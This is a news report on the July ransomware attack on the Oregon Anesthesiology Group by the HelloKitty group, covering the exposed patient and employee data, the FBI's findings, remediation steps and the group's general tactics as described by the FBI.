The Oregon Anesthesiology Group (OAG) said it suffered a ransomware attack in July that led to the breach of sensitive employee and patient information.
The breach involves the information of 750,000 patients and 522 current and former OAG employees.
In a statement, the company said it was contacted by the FBI on October 21. The FBI explained that it seized an account that contained OAG patient and employee files from HelloKitty, a Ukrainian ransomware group.
The FBI said it believes the group exploited a vulnerability in OAG’s third-party firewall, enabling the hackers to gain entry to the network.
“Patient information potentially involved in this incident included names, addresses, date(s) of service, diagnosis and procedure codes with descriptions, medical record numbers, insurance provider names, and insurance ID numbers,” OAG explained.
“The cybercriminals also potentially accessed current and former OAG employee data, including names, addresses, Social Security numbers and other details from W-2 forms on file.”
The July 11 attack locked OAG out of its servers and forced them to restore their systems from off-site backups and rebuild their IT infrastructure from the ground up. Outside cybersecurity experts were hired to help with the investigation into the attack.
“According to the cyber forensics report obtained by OAG in late November, the cybercriminals, once inside, were able to data-mine the administrator’s credentials and access OAG’s encrypted data,” OAG said.
The company has since replaced its third-party firewall and expanded the use of multifactor authentication. Victims of the incident are being provided with 12 months of Experian identity protection services and credit monitoring.
OAG added that victims should be on the lookout for scams and urged them to enroll in Experian’s IdentityWorks program, which comes with up to $1 million in identity theft insurance.
Those whose social security numbers were leaked are urged to create a mySocial Security account with the Social Security Administration, which will allow them to claim their SSN, according to OAG.
ZDNet previously reported that the HelloKitty ransomware has been active since at least 2020 and mostly targets Windows systems, with some variants being used against Linux systems.
There have been a number of HelloKitty spinoffs, including a new unnamed ransomware variant and Vice Society.
The FBI sent out a warning about the group in October, noting that the group was becoming known for aggressively pressuring its victims with the double extortion technique.
“In some cases, if the victim does not respond quickly or does not pay the ransom, the threat actors will launch a Distributed Denial of Service (DDoS) attack on the victim company’s public facing website,” the FBI said. “Hello Kitty/FiveHands actors demand varying ransom payments in Bitcoin (BTC) that appear tailored to each victim, commensurate with their assessed ability to pay it. If no ransom is paid, the threat actors will post victim data to the Babuk site (payload.bin) or sell it to a third-party data broker.”
The FBI added that the group typically uses compromised credentials or known vulnerabilities in SonicWall products and once inside the network, they will use publicly available penetration tool suites such as Cobalt Strike, Mandiant’s Commando, or PowerShell Empire preloaded with publicly available tools like Bloodhound and Mimikatz to map the network and escalate privileges before exfiltration and encryption.
In February, the group was implicated in a headline-grabbing ransomware attack on Polish game developer CD Projekt Red, the maker of popular games like Cyberpunk 2077 and The Witcher series.